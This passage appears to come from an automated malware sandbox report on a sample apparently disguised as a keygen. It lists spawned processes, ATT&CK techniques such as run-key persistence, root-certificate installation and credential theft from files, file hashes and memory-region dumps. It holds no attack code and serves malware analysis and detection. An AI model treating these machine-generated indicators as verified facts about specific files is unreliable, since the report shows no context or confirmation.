                                                                                                                                                                                                                                      PID:4892
                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:5556
                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:3028

                                                                                                                                                                                                                                    Network

                                                                                                                                                                                                                                    MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                    Persistence

                                                                                                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1060

                                                                                                                                                                                                                                    Defense Evasion

                                                                                                                                                                                                                                    Modify Registry

                                                                                                                                                                                                                                    3
                                                                                                                                                                                                                                    T1112

                                                                                                                                                                                                                                    Install Root Certificate

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1130

                                                                                                                                                                                                                                    Credential Access

                                                                                                                                                                                                                                    Credentials in Files

                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                    T1081

                                                                                                                                                                                                                                    Discovery

                                                                                                                                                                                                                                    Software Discovery

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1518

                                                                                                                                                                                                                                    Query Registry

                                                                                                                                                                                                                                    5
                                                                                                                                                                                                                                    T1012

                                                                                                                                                                                                                                    System Information Discovery

                                                                                                                                                                                                                                    6
                                                                                                                                                                                                                                    T1082

                                                                                                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1120

                                                                                                                                                                                                                                    Remote System Discovery

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1018

                                                                                                                                                                                                                                    Collection

                                                                                                                                                                                                                                    Data from Local System

                                                                                                                                                                                                                                    4
                                                                                                                                                                                                                                    T1005

                                                                                                                                                                                                                                    Command and Control

                                                                                                                                                                                                                                    Web Service

                                                                                                                                                                                                                                    1
                                                                                                                                                                                                                                    T1102

                                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      4ba4633fee4157719c8b1a1595ac08df

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      ec99c59370f795da8960f61c6de4b55b25e8f221

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      e2fa3abd2893a2ec12f8f753ba0ccbb0dd81cce821ba423c3b34412f8b9277cb

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      26f1a6c2a8259636a300732ab4d25152461585d5d8b61a0bb1e4495ded64204add3b97785d1c2945fd85ef3b470c9beefd067fbe8487f23b00a65e8f378fed00

                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                                                                    • \??\pipe\crashpad_1016_AGSZPGKISYVJSBRW
                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                    • \??\pipe\crashpad_4988_KCRFNFLGDLHQQIPN
                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                      d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                    • memory/60-277-0x000001A632E70000-0x000001A632EE2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/296-284-0x0000000005900000-0x0000000005901000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/584-288-0x000001817CF90000-0x000001817CFDB000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                                    • memory/584-289-0x000001817D120000-0x000001817D192000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/584-293-0x000001817F900000-0x000001817FA05000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.0MB

                                                                                                                                                                                                                                    • memory/1004-266-0x000002B9BC760000-0x000002B9BC7D2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/1104-275-0x000001B9CFF40000-0x000001B9CFFB2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/1192-253-0x0000026A338D0000-0x0000026A33942000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/1280-306-0x0000000140000000-0x000000014070A000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      7.0MB

                                                                                                                                                                                                                                    • memory/1280-309-0x000001D4688B0000-0x000001D4688D0000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                                    • memory/1384-280-0x000001A847960000-0x000001A8479D2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/1404-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/1404-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/1428-247-0x0000021601E50000-0x0000021601E9B000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                                    • memory/1428-278-0x0000021602700000-0x0000021602772000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/1532-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/1572-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/1800-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/1836-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/1948-250-0x000001DA5CD40000-0x000001DA5CDB2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/1972-281-0x0000000005220000-0x0000000005221000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/2148-116-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/2152-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/2244-294-0x0000000000400000-0x000000000042B000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      172KB

                                                                                                                                                                                                                                    • memory/2520-270-0x0000025AA3D70000-0x0000025AA3DE2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/2536-273-0x00000203BD040000-0x00000203BD0B2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/2584-124-0x00007FFCD55C0000-0x00007FFCD55C1000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/2584-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/2740-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/2748-248-0x0000000004780000-0x0000000004880000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1024KB

                                                                                                                                                                                                                                    • memory/2748-258-0x0000000004880000-0x00000000048DD000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      372KB

                                                                                                                                                                                                                                    • memory/2756-147-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/2760-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/2780-256-0x0000026565C50000-0x0000026565CC2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/2788-257-0x000001581FF50000-0x000001581FFC2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/2804-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/2824-262-0x00000253EAE00000-0x00000253EAE72000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/2832-295-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/2908-260-0x000001BC70D90000-0x000001BC70E02000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/3052-139-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/3188-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/3256-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/3728-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/3808-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/3828-286-0x00000000024C0000-0x0000000002551000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      580KB

                                                                                                                                                                                                                                    • memory/3828-287-0x0000000000400000-0x000000000087F000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4.5MB

                                                                                                                                                                                                                                    • memory/3832-252-0x0000000000400000-0x0000000000983000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      5.5MB

                                                                                                                                                                                                                                    • memory/3836-271-0x000000001AEF0000-0x000000001AEF2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                    • memory/3948-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/3976-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4128-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4132-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4140-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4144-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4152-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4156-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4160-282-0x00000000055C0000-0x00000000055C1000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4196-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4200-299-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4204-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4224-298-0x0000000000B30000-0x0000000000B32000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                    • memory/4328-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4492-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4548-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4556-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4556-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4568-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4580-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4592-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4596-300-0x00000000024A0000-0x00000000024A2000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                    • memory/4596-302-0x00000000024A4000-0x00000000024A5000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      4KB

                                                                                                                                                                                                                                    • memory/4596-301-0x00000000024A2000-0x00000000024A4000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                    • memory/4596-303-0x00000000024A5000-0x00000000024A7000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                    • memory/4644-246-0x00000000027C0000-0x000000000295C000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.6MB

                                                                                                                                                                                                                                    • memory/4644-291-0x0000000000700000-0x00000000007AE000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                    • memory/4644-290-0x0000000002FB0000-0x000000000309F000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      956KB

                                                                                                                                                                                                                                    • memory/4644-292-0x0000000000700000-0x00000000007AE000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      696KB

                                                                                                                                                                                                                                    • memory/4660-297-0x0000000000400000-0x0000000000416000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      88KB

                                                                                                                                                                                                                                    • memory/4700-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4700-269-0x0000000000400000-0x0000000000448000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      288KB

                                                                                                                                                                                                                                    • memory/4740-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4740-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4748-296-0x0000000000C70000-0x0000000000C72000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      8KB

                                                                                                                                                                                                                                    • memory/4752-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4788-264-0x00000268ADF00000-0x00000268ADF72000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      456KB

                                                                                                                                                                                                                                    • memory/4792-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4808-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4812-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4824-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4828-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4840-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4876-268-0x0000000000400000-0x0000000000459000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      356KB

                                                                                                                                                                                                                                    • memory/4876-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4880-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4888-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4916-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4928-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4932-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4948-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4956-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4980-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4988-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/4992-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5016-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5056-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5056-285-0x0000000010000000-0x0000000010145000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                    • memory/5056-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5056-283-0x0000000004DB0000-0x0000000004EEF000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.2MB

                                                                                                                                                                                                                                    • memory/5064-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5084-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5088-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5092-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                    • memory/5168-304-0x0000000003710000-0x0000000003758000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      288KB

                                                                                                                                                                                                                                    • memory/5468-308-0x0000000000400000-0x0000000000447000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      284KB

                                                                                                                                                                                                                                    • memory/5724-307-0x0000000002C70000-0x0000000002DBA000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      1.3MB

                                                                                                                                                                                                                                    • memory/6068-305-0x0000000140000000-0x0000000140383000-memory.dmp
                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                      3.5MB